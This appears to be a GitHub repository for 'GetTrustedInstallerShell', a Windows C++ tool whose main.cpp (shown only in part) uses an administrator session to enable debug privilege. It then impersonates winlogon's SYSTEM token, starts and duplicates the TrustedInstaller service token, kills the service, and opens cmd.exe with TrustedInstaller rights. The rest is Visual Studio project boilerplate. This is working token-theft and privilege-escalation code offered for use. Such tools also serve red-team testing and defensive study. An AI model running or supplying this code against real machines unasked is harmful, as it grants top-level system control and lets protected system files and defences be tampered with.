├── .gitignore
├── Demo
    └── GetTrustedInstallerShell.mp4
├── GetTrustedInstallerShell.sln
├── GetTrustedInstallerShell
    ├── GetTrustedInstallerShell.vcxproj
    ├── GetTrustedInstallerShell.vcxproj.filters
    └── src
    │   └── main.cpp
├── LICENSE
└── README.md


/.gitignore:
--------------------------------------------------------------------------------
  1 | ## Ignore Visual Studio temporary files, build results, and
  2 | ## files generated by popular Visual Studio add-ons.
  3 | ##
  4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
  5 | 
  6 | # User-specific files
  7 | *.rsuser
  8 | *.suo
  9 | *.user
 10 | *.userosscache
 11 | *.sln.docstates
 12 | 
 13 | # User-specific files (MonoDevelop/Xamarin Studio)
 14 | *.userprefs
 15 | 
 16 | # Mono auto generated files
 17 | mono_crash.*
 18 | 
 19 | # Build results
 20 | [Dd]ebug/
 21 | [Dd]ebugPublic/
 22 | [Rr]elease/
 23 | [Rr]eleases/
 24 | x64/
 25 | x86/
 26 | [Aa][Rr][Mm]/
 27 | [Aa][Rr][Mm]64/
 28 | bld/
 29 | [Bb]in/
 30 | [Oo]bj/
 31 | [Ll]og/
 32 | [Ll]ogs/
 33 | 
 34 | # Visual Studio 2015/2017 cache/options directory
 35 | .vs/
 36 | # Uncomment if you have tasks that create the project's static files in wwwroot
 37 | #wwwroot/
 38 | 
 39 | # Visual Studio 2017 auto generated files
 40 | Generated\ Files/
 41 | 
 42 | # MSTest test Results
 43 | [Tt]est[Rr]esult*/
 44 | [Bb]uild[Ll]og.*
 45 | 
 46 | # NUnit
 47 | *.VisualState.xml
 48 | TestResult.xml
 49 | nunit-*.xml
 50 | 
 51 | # Build Results of an ATL Project
 52 | [Dd]ebugPS/
 53 | [Rr]eleasePS/
 54 | dlldata.c
 55 | 
 56 | # Benchmark Results
 57 | BenchmarkDotNet.Artifacts/
 58 | 
 59 | # .NET Core
 60 | project.lock.json
 61 | project.fragment.lock.json
 62 | artifacts/
 63 | 
 64 | # StyleCop
 65 | StyleCopReport.xml
 66 | 
 67 | # Files built by Visual Studio
 68 | *_i.c
 69 | *_p.c
 70 | *_h.h
 71 | *.ilk
 72 | *.meta
 73 | *.obj
 74 | *.iobj
 75 | *.pch
 76 | *.pdb
 77 | *.ipdb
 78 | *.pgc
 79 | *.pgd
 80 | *.rsp
 81 | *.sbr
 82 | *.tlb
 83 | *.tli
 84 | *.tlh
 85 | *.tmp
 86 | *.tmp_proj
 87 | *_wpftmp.csproj
 88 | *.log
 89 | *.vspscc
 90 | *.vssscc
 91 | .builds
 92 | *.pidb
 93 | *.svclog
 94 | *.scc
 95 | 
 96 | # Chutzpah Test files
 97 | _Chutzpah*
 98 | 
 99 | # Visual C++ cache files
100 | ipch/
101 | *.aps
102 | *.ncb
103 | *.opendb
104 | *.opensdf
105 | *.sdf
106 | *.cachefile
107 | *.VC.db
108 | *.VC.VC.opendb
109 | 
110 | # Visual Studio profiler
111 | *.psess
112 | *.vsp
113 | *.vspx
114 | *.sap
115 | 
116 | # Visual Studio Trace Files
117 | *.e2e
118 | 
119 | # TFS 2012 Local Workspace
120 | $tf/
121 | 
122 | # Guidance Automation Toolkit
123 | *.gpState
124 | 
125 | # ReSharper is a .NET coding add-in
126 | _ReSharper*/
127 | *.[Rr]e[Ss]harper
128 | *.DotSettings.user
129 | 
130 | # TeamCity is a build add-in
131 | _TeamCity*
132 | 
133 | # DotCover is a Code Coverage Tool
134 | *.dotCover
135 | 
136 | # AxoCover is a Code Coverage Tool
137 | .axoCover/*
138 | !.axoCover/settings.json
139 | 
140 | # Visual Studio code coverage results
141 | *.coverage
142 | *.coveragexml
143 | 
144 | # NCrunch
145 | _NCrunch_*
146 | .*crunch*.local.xml
147 | nCrunchTemp_*
148 | 
149 | # MightyMoose
150 | *.mm.*
151 | AutoTest.Net/
152 | 
153 | # Web workbench (sass)
154 | .sass-cache/
155 | 
156 | # Installshield output folder
157 | [Ee]xpress/
158 | 
159 | # DocProject is a documentation generator add-in
160 | DocProject/buildhelp/
161 | DocProject/Help/*.HxT
162 | DocProject/Help/*.HxC
163 | DocProject/Help/*.hhc
164 | DocProject/Help/*.hhk
165 | DocProject/Help/*.hhp
166 | DocProject/Help/Html2
167 | DocProject/Help/html
168 | 
169 | # Click-Once directory
170 | publish/
171 | 
172 | # Publish Web Output
173 | *.[Pp]ublish.xml
174 | *.azurePubxml
175 | # Note: Comment the next line if you want to checkin your web deploy settings,
176 | # but database connection strings (with potential passwords) will be unencrypted
177 | *.pubxml
178 | *.publishproj
179 | 
180 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
181 | # checkin your Azure Web App publish settings, but sensitive information contained
182 | # in these scripts will be unencrypted
183 | PublishScripts/
184 | 
185 | # NuGet Packages
186 | *.nupkg
187 | # NuGet Symbol Packages
188 | *.snupkg
189 | # The packages folder can be ignored because of Package Restore
190 | **/[Pp]ackages/*
191 | # except build/, which is used as an MSBuild target.
192 | !**/[Pp]ackages/build/
193 | # Uncomment if necessary however generally it will be regenerated when needed
194 | #!**/[Pp]ackages/repositories.config
195 | # NuGet v3's project.json files produces more ignorable files
196 | *.nuget.props
197 | *.nuget.targets
198 | 
199 | # Microsoft Azure Build Output
200 | csx/
201 | *.build.csdef
202 | 
203 | # Microsoft Azure Emulator
204 | ecf/
205 | rcf/
206 | 
207 | # Windows Store app package directories and files
208 | AppPackages/
209 | BundleArtifacts/
210 | Package.StoreAssociation.xml
211 | _pkginfo.txt
212 | *.appx
213 | *.appxbundle
214 | *.appxupload
215 | 
216 | # Visual Studio cache files
217 | # files ending in .cache can be ignored
218 | *.[Cc]ache
219 | # but keep track of directories ending in .cache
220 | !?*.[Cc]ache/
221 | 
222 | # Others
223 | ClientBin/
224 | ~$*
225 | *~
226 | *.dbmdl
227 | *.dbproj.schemaview
228 | *.jfm
229 | *.pfx
230 | *.publishsettings
231 | orleans.codegen.cs
232 | 
233 | # Including strong name files can present a security risk
234 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
235 | #*.snk
236 | 
237 | # Since there are multiple workflows, uncomment next line to ignore bower_components
238 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
239 | #bower_components/
240 | 
241 | # RIA/Silverlight projects
242 | Generated_Code/
243 | 
244 | # Backup & report files from converting an old project file
245 | # to a newer Visual Studio version. Backup files are not needed,
246 | # because we have git ;-)
247 | _UpgradeReport_Files/
248 | Backup*/
249 | UpgradeLog*.XML
250 | UpgradeLog*.htm
251 | ServiceFabricBackup/
252 | *.rptproj.bak
253 | 
254 | # SQL Server files
255 | *.mdf
256 | *.ldf
257 | *.ndf
258 | 
259 | # Business Intelligence projects
260 | *.rdl.data
261 | *.bim.layout
262 | *.bim_*.settings
263 | *.rptproj.rsuser
264 | *- [Bb]ackup.rdl
265 | *- [Bb]ackup ([0-9]).rdl
266 | *- [Bb]ackup ([0-9][0-9]).rdl
267 | 
268 | # Microsoft Fakes
269 | FakesAssemblies/
270 | 
271 | # GhostDoc plugin setting file
272 | *.GhostDoc.xml
273 | 
274 | # Node.js Tools for Visual Studio
275 | .ntvs_analysis.dat
276 | node_modules/
277 | 
278 | # Visual Studio 6 build log
279 | *.plg
280 | 
281 | # Visual Studio 6 workspace options file
282 | *.opt
283 | 
284 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
285 | *.vbw
286 | 
287 | # Visual Studio LightSwitch build output
288 | **/*.HTMLClient/GeneratedArtifacts
289 | **/*.DesktopClient/GeneratedArtifacts
290 | **/*.DesktopClient/ModelManifest.xml
291 | **/*.Server/GeneratedArtifacts
292 | **/*.Server/ModelManifest.xml
293 | _Pvt_Extensions
294 | 
295 | # Paket dependency manager
296 | .paket/paket.exe
297 | paket-files/
298 | 
299 | # FAKE - F# Make
300 | .fake/
301 | 
302 | # CodeRush personal settings
303 | .cr/personal
304 | 
305 | # Python Tools for Visual Studio (PTVS)
306 | __pycache__/
307 | *.pyc
308 | 
309 | # Cake - Uncomment if you are using it
310 | # tools/**
311 | # !tools/packages.config
312 | 
313 | # Tabs Studio
314 | *.tss
315 | 
316 | # Telerik's JustMock configuration file
317 | *.jmconfig
318 | 
319 | # BizTalk build output
320 | *.btp.cs
321 | *.btm.cs
322 | *.odx.cs
323 | *.xsd.cs
324 | 
325 | # OpenCover UI analysis results
326 | OpenCover/
327 | 
328 | # Azure Stream Analytics local run output
329 | ASALocalRun/
330 | 
331 | # MSBuild Binary and Structured Log
332 | *.binlog
333 | 
334 | # NVidia Nsight GPU debugger configuration file
335 | *.nvuser
336 | 
337 | # MFractors (Xamarin productivity tool) working folder
338 | .mfractor/
339 | 
340 | # Local History for Visual Studio
341 | .localhistory/
342 | 
343 | # BeatPulse healthcheck temp database
344 | healthchecksdb
345 | 
346 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
347 | MigrationBackup/
348 | 
349 | # Ionide (cross platform F# VS Code tools) working folder
350 | .ionide/
351 | 


--------------------------------------------------------------------------------
/Demo/GetTrustedInstallerShell.mp4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wilszdev/GetTrustedInstallerShell/b0ab04bc44e21256086a4337bc2a75a6cff86f5c/Demo/GetTrustedInstallerShell.mp4


--------------------------------------------------------------------------------
/GetTrustedInstallerShell.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.31005.135
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "GetTrustedInstallerShell", "GetTrustedInstallerShell\GetTrustedInstallerShell.vcxproj", "{2446785E-E78E-45F0-A89E-FEA778C1E51B}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{2446785E-E78E-45F0-A89E-FEA778C1E51B}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{2446785E-E78E-45F0-A89E-FEA778C1E51B}.Debug|x64.Build.0 = Debug|x64
18 | 		{2446785E-E78E-45F0-A89E-FEA778C1E51B}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{2446785E-E78E-45F0-A89E-FEA778C1E51B}.Debug|x86.Build.0 = Debug|Win32
20 | 		{2446785E-E78E-45F0-A89E-FEA778C1E51B}.Release|x64.ActiveCfg = Release|x64
21 | 		{2446785E-E78E-45F0-A89E-FEA778C1E51B}.Release|x64.Build.0 = Release|x64
22 | 		{2446785E-E78E-45F0-A89E-FEA778C1E51B}.Release|x86.ActiveCfg = Release|Win32
23 | 		{2446785E-E78E-45F0-A89E-FEA778C1E51B}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {BAB527F6-C17C-4BF4-9446-F118A022E8D1}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/GetTrustedInstallerShell/GetTrustedInstallerShell.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{2446785e-e78e-45f0-a89e-fea778c1e51b}</ProjectGuid>
 25 |     <RootNamespace>GetTrustedInstallerShell</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v142</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v142</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v142</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v142</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 77 |     <LinkIncremental>false</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 80 |     <LinkIncremental>true</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <WarningLevel>Level3</WarningLevel>
 88 |       <SDLCheck>true</SDLCheck>
 89 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 90 |       <ConformanceMode>true</ConformanceMode>
 91 |     </ClCompile>
 92 |     <Link>
 93 |       <SubSystem>Console</SubSystem>
 94 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 95 |     </Link>
 96 |   </ItemDefinitionGroup>
 97 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 98 |     <ClCompile>
 99 |       <WarningLevel>Level3</WarningLevel>
100 |       <FunctionLevelLinking>true</FunctionLevelLinking>
101 |       <IntrinsicFunctions>true</IntrinsicFunctions>
102 |       <SDLCheck>true</SDLCheck>
103 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
104 |       <ConformanceMode>true</ConformanceMode>
105 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
106 |     </ClCompile>
107 |     <Link>
108 |       <SubSystem>Console</SubSystem>
109 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
110 |       <OptimizeReferences>true</OptimizeReferences>
111 |       <GenerateDebugInformation>true</GenerateDebugInformation>
112 |     </Link>
113 |   </ItemDefinitionGroup>
114 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
115 |     <ClCompile>
116 |       <WarningLevel>Level3</WarningLevel>
117 |       <SDLCheck>true</SDLCheck>
118 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
119 |       <ConformanceMode>true</ConformanceMode>
120 |     </ClCompile>
121 |     <Link>
122 |       <SubSystem>Console</SubSystem>
123 |       <GenerateDebugInformation>true</GenerateDebugInformation>
124 |     </Link>
125 |   </ItemDefinitionGroup>
126 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
127 |     <ClCompile>
128 |       <WarningLevel>Level3</WarningLevel>
129 |       <FunctionLevelLinking>true</FunctionLevelLinking>
130 |       <IntrinsicFunctions>true</IntrinsicFunctions>
131 |       <SDLCheck>true</SDLCheck>
132 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
133 |       <ConformanceMode>true</ConformanceMode>
134 |     </ClCompile>
135 |     <Link>
136 |       <SubSystem>Console</SubSystem>
137 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
138 |       <OptimizeReferences>true</OptimizeReferences>
139 |       <GenerateDebugInformation>true</GenerateDebugInformation>
140 |     </Link>
141 |   </ItemDefinitionGroup>
142 |   <ItemGroup>
143 |     <ClCompile Include="src\main.cpp" />
144 |   </ItemGroup>
145 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
146 |   <ImportGroup Label="ExtensionTargets">
147 |   </ImportGroup>
148 | </Project>


--------------------------------------------------------------------------------
/GetTrustedInstallerShell/GetTrustedInstallerShell.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="src\main.cpp">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 | </Project>


--------------------------------------------------------------------------------
/GetTrustedInstallerShell/src/main.cpp:
--------------------------------------------------------------------------------
  1 | #define WIN32_LEAN_AND_MEAN
  2 | #include <windows.h>
  3 | #include <TlHelp32.h>
  4 | #include <comdef.h>
  5 | #include <cstdio>
  6 | #include <string>
  7 | 
  8 | /// <summary>
  9 | /// Displays a message, followed by the descriptor for a win32 error code
 10 | /// </summary>
 11 | /// <param name="msg">: message to display, precedes error description</param>
 12 | /// <param name="err">: win32 error code. optional.</param>
 13 | void PrintError(const char* msg, DWORD err = -1);
 14 | /// <summary>
 15 | /// Get a handle to the primary token of a process
 16 | /// </summary>
 17 | /// <param name="pid">: target process id. if value is 0, gets token for current process</param>
 18 | /// <returns>handle to the process' token</returns>
 19 | HANDLE GetProcessToken(DWORD pid);
 20 | /// <summary>
 21 | /// Duplicate a token with the specified type
 22 | /// </summary>
 23 | /// <param name="pid">: target process id</param>
 24 | /// <param name="type">: type of token (impersonation or primary)</param>
 25 | /// <returns>handle to the duplicate token</returns>
 26 | HANDLE DuplicateProcessToken(DWORD pid, TOKEN_TYPE type);
 27 | /// <summary>
 28 | /// enable or disable the specified privilege
 29 | /// </summary>
 30 | /// <param name="hToken">: handle to process token</param>
 31 | /// <param name="lpszPrivilege">: privilege name</param>
 32 | /// <param name="bEnablePrivilege">: TRUE to enable privilege, FALSE to disable</param>
 33 | /// <returns>win32 error code (0 on success)</returns>
 34 | DWORD SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege);
 35 | /// <summary>
 36 | /// enable debug privilege for current process
 37 | /// </summary>
 38 | /// <returns>true on success</returns>
 39 | bool GetDebugPrivilege();
 40 | /// <summary>
 41 | /// Get pid of process with specified name.
 42 | /// </summary>
 43 | /// <param name="procName">: name of executable file for process</param>
 44 | /// <returns>process id</returns>
 45 | DWORD GetPidByName(const wchar_t* procName);
 46 | /// <summary>
 47 | /// calls TerminateProcess
 48 | /// </summary>
 49 | /// <param name="pid">process id of target</param>
 50 | /// <returns>success</returns>
 51 | bool TerminateProcess(DWORD pid);
 52 | 
 53 | /// <summary>
 54 | /// get a shell with trustedinstaller privileges
 55 | /// </summary>
 56 | int main(int argc, char** argv) {
 57 | #pragma region get debug privilege
 58 | 	// get debug privilege
 59 | 	if (!GetDebugPrivilege()) {
 60 | 		printf("[-] could not enable debug privilege. please run as a local administrator.");
 61 | 		return -1;
 62 | 	}
 63 | 	printf("[+] enabled debug privilege\n");
 64 | #pragma endregion
 65 | 
 66 | #pragma region get target pid
 67 | 	// pid
 68 | 	DWORD pid;
 69 | 	if (argc == 2)
 70 | 		/*
 71 | 		*  use 1st argument as target pid.
 72 | 		*  target should be a system process, otherwise impersonating its token will not
 73 | 		*  give sufficient permissions to allow accessing the trustedinstaller token
 74 | 		*/
 75 | 		pid = atoi(argv[1]);
 76 | 	else
 77 | 		pid = GetPidByName(L"winlogon.exe");
 78 | 	if (pid == 0) return -1;  // unable to find process (or first argument was not an integer)
 79 | #pragma endregion
 80 | 
 81 | #pragma region impersonate system
 82 | 	// duplicate system token as an impersonation token
 83 | 	HANDLE hImpToken = DuplicateProcessToken(pid, TOKEN_TYPE::TokenImpersonation);
 84 | 	if (hImpToken != INVALID_HANDLE_VALUE) printf("[+] process token duplicated\n");
 85 | 	else { printf("[-] failed to duplicate token\n");  return -1; }
 86 | 
 87 | 	// use the impersonation token
 88 | 	HANDLE hThread = GetCurrentThread();
 89 | 	if (!SetThreadToken(&hThread, hImpToken)) {
 90 | 		PrintError("SetThreadToken()", GetLastError());
 91 | 		return -1;
 92 | 	}
 93 | 	printf("[+] successfully impersonated\n");
 94 | 
 95 | 	// don't need these handles anymore
 96 | 	CloseHandle(hThread);
 97 | 	CloseHandle(hImpToken);
 98 | #pragma endregion
 99 | 
100 | #pragma region start trustedinstaller
101 | 	// get handle to trustedinstaller service
102 | 	SC_HANDLE hService = OpenServiceW(OpenSCManagerW(NULL, NULL, SC_MANAGER_ALL_ACCESS), L"trustedinstaller", MAXIMUM_ALLOWED);
103 | 	if (!hService) {
104 | 		PrintError("OpenServiceW()", GetLastError());
105 | 		return -1;
106 | 	}
107 | 	// check if service is already running
108 | 	SERVICE_STATUS_PROCESS ssp = {}; DWORD bytesNeeded;
109 | 	if (!QueryServiceStatusEx(hService, SC_STATUS_PROCESS_INFO, (BYTE*)&ssp, sizeof(ssp), &bytesNeeded)) {
110 | 		PrintError("QueryServiceStatusEx()", GetLastError());
111 | 		return -1;
112 | 	}
113 | 	// if running do nothing, otherwise start service and query again
114 | 	if (ssp.dwCurrentState == SERVICE_RUNNING) {
115 | 		printf("[+] trustedinstaller service already running\n");
116 | 	}
117 | 	else {
118 | 		// start
119 | 		if (!StartServiceW(hService, 0, NULL)) {
120 | 			PrintError("StartServiceW()", GetLastError());
121 | 			return -1;
122 | 		}
123 | 		printf("[+] started trustedinstaller service\n");
124 | 
125 | 		// update ssp (interested in the pid)
126 | 		if (!QueryServiceStatusEx(hService, SC_STATUS_PROCESS_INFO, (BYTE*)&ssp, sizeof(ssp), &bytesNeeded)) {
127 | 			PrintError("QueryServiceStatusEx()", GetLastError());
128 | 			return -1;
129 | 		}
130 | 	}
131 | 	CloseServiceHandle(hService);
132 | #pragma endregion
133 | 
134 | #pragma region duplicate trustedinstaller token
135 | 	// get pid from service status query
136 | 	printf("[+] pid of trustedinstaller service: %d\n", ssp.dwProcessId);
137 | 	// duplicate token
138 | 	HANDLE hTrustedInstallerToken = DuplicateProcessToken(ssp.dwProcessId, TOKEN_TYPE::TokenPrimary);
139 | 	if (hTrustedInstallerToken != INVALID_HANDLE_VALUE) printf("[+] process token duplicated\n");
140 | 	else { printf("[-] failed to duplicate token\n");  return -1; }
141 | #pragma endregion
142 | 
143 | #pragma region stop trustedinstaller service
144 | 	// stop service by killing process, as it does not accept SERVICE_CONTROL_STOP
145 | 	if (TerminateProcess(ssp.dwProcessId))
146 | 	{
147 | 		printf("[+] stopped trustedinstaller service\n");
148 | 	}
149 | #pragma endregion
150 | 
151 | #pragma region stop trustedinstaller process
152 | 	if (TerminateProcess(GetPidByName(L"TrustedInstaller.exe")))
153 | 	{
154 | 		printf("[+] killed trustedinstaller process\n");
155 | 	}
156 | #pragma endregion
157 | 
158 | #pragma region create process with trustedinstaller token
159 | 	// start new process with token
160 | 	STARTUPINFO si = {};
161 | 	PROCESS_INFORMATION pi = {};
162 | 	BOOL success = CreateProcessWithTokenW(hTrustedInstallerToken, LOGON_NETCREDENTIALS_ONLY, L"C:\\Windows\\System32\\cmd.exe", NULL, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
163 | 	if (!success) {
164 | 		PrintError("CreateProcessWithTokenW()", GetLastError());
165 | 		return -1;
166 | 	}
167 | 	printf("[+] created cmd process with trustedinstaller token\n");
168 | 	CloseHandle(hTrustedInstallerToken);
169 | #pragma endregion
170 | 
171 | 	return 0;
172 | }
173 | 
174 | HANDLE GetProcessToken(DWORD pid) {
175 | 	HANDLE hCurrentProcess = {};
176 | 	HANDLE hToken = {};
177 | 	// get handle to process
178 | 	if (pid == 0)
179 | 	{
180 | 		hCurrentProcess = GetCurrentProcess();
181 | 	}
182 | 	else
183 | 	{
184 | 		hCurrentProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, TRUE, pid);
185 | 		if (!hCurrentProcess)
186 | 		{
187 | 			PrintError("OpenProcess()", GetLastError());
188 | 			return INVALID_HANDLE_VALUE;
189 | 		}
190 | 	}
191 | 	// get handle to token
192 | 	if (!OpenProcessToken(hCurrentProcess, TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY, &hToken))
193 | 	{
194 | 		PrintError("OpenProcessToken()", GetLastError());
195 | 		CloseHandle(hCurrentProcess);
196 | 		return INVALID_HANDLE_VALUE;
197 | 	}
198 | 	CloseHandle(hCurrentProcess);
199 | 	return hToken;
200 | }
201 | 
202 | HANDLE DuplicateProcessToken(DWORD pid, TOKEN_TYPE tokenType) {
203 | 	// retrieve token
204 | 	HANDLE hToken = GetProcessToken(pid);
205 | 	if (hToken == INVALID_HANDLE_VALUE) return INVALID_HANDLE_VALUE;
206 | 
207 | 	// args for DuplicateTokenEx
208 | 	SECURITY_IMPERSONATION_LEVEL seImpersonateLevel = SecurityImpersonation;
209 | 	HANDLE hNewToken = {};
210 | 	// duplicate the token
211 | 	if (!DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, seImpersonateLevel, tokenType, &hNewToken)) {
212 | 		PrintError("DuplicateTokenEx()", GetLastError());
213 | 		CloseHandle(hToken);
